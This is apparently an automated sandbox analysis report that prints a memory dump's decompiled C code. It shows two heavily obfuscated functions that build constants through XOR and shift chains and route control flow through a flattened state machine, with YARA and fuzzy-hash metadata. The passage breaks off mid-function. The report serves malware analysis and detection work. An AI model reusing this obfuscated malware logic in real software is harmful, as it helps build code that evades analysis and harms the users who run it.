                                                      0x0023257d
                                                      0x0023282d
                                                      0x00232583
                                                      0x00232583
                                                      0x00000000
                                                      0x00232583
                                                      0x0023257d
                                                      0x0023253e
                                                      0x00232536
                                                      0x0023252a
                                                      0x00232522
                                                      0x00232516
                                                      0x00232721
                                                      0x0023272d
                                                      0x0023272d
                                                      0x002326d9
                                                      0x002327fb
                                                      0x00232802
                                                      0x00232807
                                                      0x0023280c
                                                      0x00232818
                                                      0x00000000
                                                      0x0023280e
                                                      0x0023280e
                                                      0x00000000
                                                      0x0023280e
                                                      0x002326df
                                                      0x002326e5
                                                      0x00232796
                                                      0x0023279b
                                                      0x0023279c
                                                      0x002327a0
                                                      0x002327a5
                                                      0x002327a8
                                                      0x00000000
                                                      0x002326eb
                                                      0x002326f1
                                                      0x00232744
                                                      0x0023275b
                                                      0x00232761
                                                      0x00232764
                                                      0x00232769
                                                      0x00232770
                                                      0x00232778
                                                      0x00000000
                                                      0x002326f3
                                                      0x002326f9
                                                      0x00000000
                                                      0x002326ff
                                                      0x0023271a
                                                      0x00232720
                                                      0x002326f9
                                                      0x002326f1
                                                      0x002326e5
                                                      0x00000000
                                                      0x0023281a
                                                      0x0023281a
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$t<$0$@$uG$
                                                      • API String ID: 0-1338720442
                                                      • Opcode ID: 0d813abe9c26d290c133af1fbeb8e3a4a1a790cbb49830dc7160ca0a1be9e933
                                                      • Instruction ID: f9f00108a93da0cdfd006c6a4615d5512db971c54960b805ef79dd27e04c9a10
                                                      • Opcode Fuzzy Hash: 0d813abe9c26d290c133af1fbeb8e3a4a1a790cbb49830dc7160ca0a1be9e933
                                                      • Instruction Fuzzy Hash: F1425671508381DFE3B8CF25C84AA9BBBE1BBC4304F10891DE5D9962A0D7B58859CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0024511B, Relevance: 17.9, Strings: 14, Instructions: 390COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0024511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00242674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00248C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00238736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x24c7a0);
					_push(_v208);
					E00237F4B(_t521, E0024878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00242025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0023EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0023B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0023EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0023B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x24c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002311C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0024878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00242025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}




































































                                                      0x0024511b
                                                      0x0024511b
                                                      0x00245125
                                                      0x0024512c
                                                      0x00245133
                                                      0x0024513b
                                                      0x00245146
                                                      0x0024514e
                                                      0x00245156
                                                      0x0024515e
                                                      0x00245163
                                                      0x0024516b
                                                      0x00245176
                                                      0x0024517e
                                                      0x00245189
                                                      0x00245191
                                                      0x00245196
                                                      0x0024519e
                                                      0x002451a6
                                                      0x002451ae
                                                      0x002451b6
                                                      0x002451be
                                                      0x002451c3
                                                      0x002451cb
                                                      0x002451d0
                                                      0x002451d8
                                                      0x002451e0
                                                      0x002451e9
                                                      0x002451f2
                                                      0x002451f7
                                                      0x002451fd
                                                      0x00245205
                                                      0x00245218
                                                      0x0024521b
                                                      0x0024521e
                                                      0x00245225
                                                      0x00245230
                                                      0x00245238
                                                      0x00245240
                                                      0x00245248
                                                      0x00245250
                                                      0x00245258
                                                      0x00245260
                                                      0x00245265
                                                      0x0024526d
                                                      0x00245275
                                                      0x00245280
                                                      0x00245288
                                                      0x00245293
                                                      0x002452a0
                                                      0x002452a4
                                                      0x002452b1
                                                      0x002452b5
                                                      0x002452bd
                                                      0x002452c8
                                                      0x002452d3
                                                      0x002452de
                                                      0x002452e6
                                                      0x002452f0
                                                      0x002452f4
                                                      0x002452fc
                                                      0x00245306
                                                      0x00245312
                                                      0x00245317
                                                      0x0024531d
                                                      0x00245322
                                                      0x0024532a
                                                      0x00245332
                                                      0x0024533a
                                                      0x0024533f
                                                      0x00245344
                                                      0x0024534c
                                                      0x00245354
                                                      0x0024535c
                                                      0x00245361
                                                      0x00245369
                                                      0x00245371
                                                      0x00245379
                                                      0x00245381
                                                      0x0024538b
                                                      0x0024538e
                                                      0x00245392
                                                      0x0024539a
                                                      0x002453a5
                                                      0x002453b0
                                                      0x002453bb
                                                      0x002453c6
                                                      0x002453ce
                                                      0x002453d9
                                                      0x002453e4
                                                      0x002453ec
                                                      0x002453f7
                                                      0x002453ff
                                                      0x00245407
                                                      0x0024540f
                                                      0x00245417
                                                      0x0024541f
                                                      0x00245427
                                                      0x0024542f
                                                      0x0024543c
                                                      0x00245440
                                                      0x00245445
                                                      0x0024544d
                                                      0x00245455
                                                      0x0024545d
                                                      0x00245465
                                                      0x0024546d
                                                      0x00245475
                                                      0x00245480
                                                      0x00245488
                                                      0x00245493
                                                      0x0024549b
                                                      0x002454a3
                                                      0x002454b0
                                                      0x002454b4
                                                      0x002454bc
                                                      0x002454c8
                                                      0x002454cd
                                                      0x002454d3
                                                      0x002454db
                                                      0x002454e3
                                                      0x002454eb
                                                      0x002454f4
                                                      0x002454f7
                                                      0x002454fb
                                                      0x00245503
                                                      0x0024550b
                                                      0x00245513
                                                      0x0024551b
                                                      0x00245525
                                                      0x00245530
                                                      0x00245538
                                                      0x00245543
                                                      0x0024554e
                                                      0x00245559
                                                      0x00245564
                                                      0x00245573
                                                      0x0024557a
                                                      0x0024557e
                                                      0x00245586
                                                      0x0024558e
                                                      0x0024559b
                                                      0x0024559f
                                                      0x002455a7
                                                      0x002455af
                                                      0x002455bc
                                                      0x002455c8
                                                      0x002455cf
                                                      0x002455d3
                                                      0x002455db
                                                      0x002455e3
                                                      0x002455eb
                                                      0x002455f3
                                                      0x002455fb
                                                      0x00245603
                                                      0x00245619
                                                      0x00245620
                                                      0x0024562b
                                                      0x0024563e
                                                      0x00245641
                                                      0x00245648
                                                      0x00245653
                                                      0x0024565e
                                                      0x00245666
                                                      0x00245671
                                                      0x00245687
                                                      0x0024568e
                                                      0x00245699
                                                      0x002456a1
                                                      0x002456ad
                                                      0x002456b0
                                                      0x002456b7
                                                      0x002456bb
                                                      0x002456c3
                                                      0x002456d6
                                                      0x002456dd
                                                      0x002456e8
                                                      0x002456f0
                                                      0x002456f8
                                                      0x00245700
                                                      0x00245708
                                                      0x00245710
                                                      0x00245722
                                                      0x00245848
                                                      0x0024584d
                                                      0x00245854
                                                      0x00245857
                                                      0x0024585c
                                                      0x00000000
                                                      0x0024585c
                                                      0x0024572e
                                                      0x00245817
                                                      0x00245821
                                                      0x00000000
                                                      0x00245821
                                                      0x0024573a
                                                      0x00245806
                                                      0x0024580d
                                                      0x002457ea
                                                      0x002457ea
                                                      0x00000000
                                                      0x002457ea
                                                      0x00245746
                                                      0x002457c7
                                                      0x002457c8
                                                      0x002457d1
                                                      0x002457d3
                                                      0x002457d8
                                                      0x002457da
                                                      0x00245998
                                                      0x00245998
                                                      0x00000000
                                                      0x00245998
                                                      0x002457e3
                                                      0x002457e8
                                                      0x002457e8
                                                      0x00000000
                                                      0x002457e8
                                                      0x00245748
                                                      0x0024574e
                                                      0x0024598c
                                                      0x0024598c
                                                      0x00245992
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00245992
                                                      0x00245754
                                                      0x00245759
                                                      0x00245792
                                                      0x002457ab
                                                      0x00000000
                                                      0x002457b5
                                                      0x002458a2
                                                      0x002458a7
                                                      0x002458b0
                                                      0x002458c3
                                                      0x002458ef
                                                      0x002458f4
                                                      0x002458f9
                                                      0x002458fe
                                                      0x00245913
                                                      0x0024596b
                                                      0x0024596b
                                                      0x00245978
                                                      0x0024597d
                                                      0x00245984
                                                      0x00245987
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
                                                      • API String ID: 0-2620103065
                                                      • Opcode ID: 3d7e032fbf91e61429af105e81e8f065e611736050ffc5f29b04d4394e611f4f
                                                      • Instruction ID: 618da252c70ab019f5b47d86f838cc0a577455b003744142f3b1ac404a88b6d4
                                                      • Opcode Fuzzy Hash: 3d7e032fbf91e61429af105e81e8f065e611736050ffc5f29b04d4394e611f4f
                                                      • Instruction Fuzzy Hash: 04222371508380DFE368CF25C58AA8BFBE1BBC4748F108A1DE5D9962A1D7B58949CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00234A35, Relevance: 16.7, Strings: 13, Instructions: 468COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00234A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00246D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0023F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0023F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00241773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
